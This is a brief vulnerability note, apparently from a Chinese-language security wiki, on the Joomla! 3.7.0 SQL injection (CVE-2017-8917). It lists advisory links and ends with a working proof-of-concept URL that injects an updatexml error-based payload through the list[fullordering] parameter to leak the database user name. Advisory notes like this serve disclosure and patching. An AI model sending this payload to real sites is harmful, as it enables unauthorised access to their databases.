Joomla! 3.7.0 SQL注入(CVE-2017-8917)¶
Official¶
https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8917
Affected Version¶
Joomla! 3.7.0
PoC¶
直接访问,爆出数据库用户名:
http://foo.com/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)